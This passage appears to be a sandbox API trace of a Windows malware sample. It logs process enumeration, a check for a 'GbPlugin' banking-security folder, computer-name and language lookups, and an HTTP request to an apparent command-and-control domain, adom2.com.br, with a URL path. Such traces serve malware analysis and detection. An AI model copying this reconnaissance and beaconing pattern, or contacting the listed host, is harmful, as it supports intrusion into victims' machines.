lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.595] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.596] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.596] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.597] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.597] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.598] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.599] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.599] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.600] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.600] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.601] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.601] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.602] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.602] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.603] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.603] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.604] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x308, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.604] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.605] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.605] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.606] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.606] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="jusched.exe")) returned 1 [0221.607] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.608] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.608] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9e, th32ParentProcessID=0x644, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.609] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.609] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.610] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.610] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.611] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.611] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.612] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0221.612] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0221.613] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\") returned 0xffffffff [0221.613] GetLastError () returned 0x2 [0221.613] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\GbPlugin") returned 0xffffffff [0221.613] GetLastError () returned 0x3 [0221.613] GetFileAttributesW (lpFileName="C:\\Program Files\\GbPlugin") returned 0xffffffff [0221.613] GetLastError () returned 0x2 [0221.613] GetComputerNameW (in: lpBuffer=0x71e046c, nSize=0x68ff640 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff640) returned 1 [0221.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x68ff608 | out: phkResult=0x68ff608*=0x0) returned 0x5 [0221.614] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0221.614] GetComputerNameW (in: lpBuffer=0x71e046c, nSize=0x68ff5e4 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5e4) returned 1 [0221.614] GetComputerNameW (in: lpBuffer=0x71e0494, nSize=0x68ff620 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff620) returned 1 [0221.614] GetComputerNameW (in: lpBuffer=0x71e0494, nSize=0x68ff5f8 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5f8) returned 1 [0221.614] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E", lpFindFileData=0x68ff3d0 | out: lpFindFileData=0x68ff3d0) returned 0x2fcc118 [0221.614] FileTimeToLocalFileTime (in: lpFileTime=0x68ff3e4, lpLocalFileTime=0x68ff34c | out: lpLocalFileTime=0x68ff34c) returned 1 [0221.614] FileTimeToDosDateTime (in: lpFileTime=0x68ff34c, lpFatDate=0x68ff3b2, lpFatTime=0x68ff3b0 | out: lpFatDate=0x68ff3b2, lpFatTime=0x68ff3b0) returned 1 [0221.614] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75900000 [0221.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VerLanguageNameW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="VerLanguageNameW", cchWideChar=16, lpMultiByteStr=0x71e0564, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerLanguageNameW", lpUsedDefaultChar=0x0) returned 16 [0221.615] GetProcAddress (hModule=0x75900000, lpProcName="VerLanguageNameW") returned 0x75938ca1 [0221.615] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75900000 [0221.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetSystemDefaultLangID", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0221.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetSystemDefaultLangID", cchWideChar=22, lpMultiByteStr=0x71e0564, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetSystemDefaultLangID", lpUsedDefaultChar=0x0) returned 22 [0221.616] GetProcAddress (hModule=0x75900000, lpProcName="GetSystemDefaultLangID") returned 0x7593db6e [0221.616] GetSystemDefaultLangID () returned 0x90409 [0221.616] VerLanguageNameW (in: wLang=0x409, szLang=0x68ff548, cchLang=0x64 | out: szLang="English (United States)") returned 0x17 [0221.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0221.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/nosoanfhtympkl50tre/infx/s1/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0221.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0221.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="adom2.com.br", cchCount2=12) returned 1 [0221.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0221.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff389, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0221.618] socket (af=2, type=1, protocol=0) returned 0xb34 [0221.618] getsockopt (in: s=0xb34, level=65535, optname=4104, optval=0x68ff450, optlen=0x68ff44c | out: optval="\x01", optlen=0x68ff44c) returned 0 [0221.618] getsockopt (in: s=0xb34, level=6, optname=1, optval=0x68ff450, optlen=0x68ff44c | out: optval="", optlen=0x68ff44c) returned 0 [0221.618] setsockopt (s=0xb34, level=65535, optname=4, optval="", optlen=4) returned 0 [0221.618] htons (hostshort=0x0) returned 0x0 [0221.618] bind (s=0xb34, addr=0x68ff3b0*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0221.619] getsockname (in: s=0xb34, name=0x68ff3a4, namelen=0x68ff424 | out: name=0x68ff3a4*(sa_family=2, sin_port=0xc010, sin_addr="0.0.0.0"), namelen=0x68ff424) returned 0 [0221.619] htons (hostshort=0x10c0) returned 0xc010 [0221.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="adom2.com.br", cchCount1=12, lpString2="LOCALHOST", cchCount2=9) returned 1 [0221.619] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="adom2.com.br", cchUnicodeChar=12, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 12 [0221.619] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="adom2.com.br", cchUnicodeChar=12, lpASCIICharStr=0x71e717c, cchASCIIChar=12 | out: lpASCIICharStr="adom2.com.br") returned 12 [0221.619] GetAddrInfoW (in: pNodeName="adom2.com.br", pServiceName=0x0, pHints=0x68ff458, ppResult=0x68ff478 | out: ppResult=0x68ff478) returned 0 [0221.636] FreeAddrInfoW (pAddrInfo=0x300afb0) [0221.636] htons (hostshort=0x50) returned 0x5000 [0221.636] connect (s=0xb34, name=0x68ff408*(sa_family=2, sin_port=0x50, sin_addr="127.0.0.1"), namelen=16) returned 0 [0221.636] getsockname (in: s=0xb34, name=0x68ff3f0, namelen=0x68ff470 | out: name=0x68ff3f0*(sa_family=2, sin_port=0xc010, sin_addr="127.0.0.1"), namelen=0x68ff470) returned 0 [0221.637] htons (hostshort=0x10c0) returned 0xc010 [0221.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x71ca63c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11 [0221.637] GetProcAddress (hModule=0x773f0000, lpProcName="getpeername") returned 0x773f7147 [0221.637] getpeername (in: s=0xb34, name=0x68ff3f0, namelen=0x68ff470 | out: name=0x68ff3f0*(sa_family=2, sin_port=0x50, sin_addr="127.0.0.1"), namelen=0x68ff470) returned 0 [0221.637] htons (hostshort=0x5000) returned 0x50 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.637] GetCurrentThreadId () returned 0xc04 [0221.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept-Encoding", cchCount2=15) returned 3 [0221.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="Accept-Encoding", cchCount2=15) returned 1 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0221.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0221.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Encoding", cchCount1=15, lpString2="User-Agent", cchCount2=10) returned 1 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] GetCurrentThreadId () returned 0xc04 [0221.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x71d1a8c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4 [0221.639] GetProcAddress (hModule=0x773f0000, lpProcName="send") returned 0x773f6f01 [0221.639] send (in: s=0xb34, buf=0x71243a8*, len=331, flags=0 | out: buf=0x71243a8*) returned 331 [0221.639] GetTickCount () returned 0x3ede6 [0221.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0221.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x71d1a8c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6 [0221.640] GetProcAddress (hModule=0x773f0000, lpProcName="select") returned 0x773f6989 [0221.640] select (in: nfds=0, readfds=0x68ff354, writefds=0x0, exceptfds=0x0, timeout=0x68ff33c | out: readfds=0x68ff354, writefds=0x0, exceptfds=0x0) returned 1 [0221.690] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.690] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x71d1a8c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4 [0221.691] GetProcAddress (hModule=0x773f0000, lpProcName="recv") returned 0x773f6b0e [0221.691] recv (in: s=0xb34, buf=0x70feb08, len=32768, flags=0 | out: buf=0x70feb08*) returned 523 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] GetTickCount () returned 0x3ee15 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Cache-control", cchCount2=13) returned 3 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0221.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 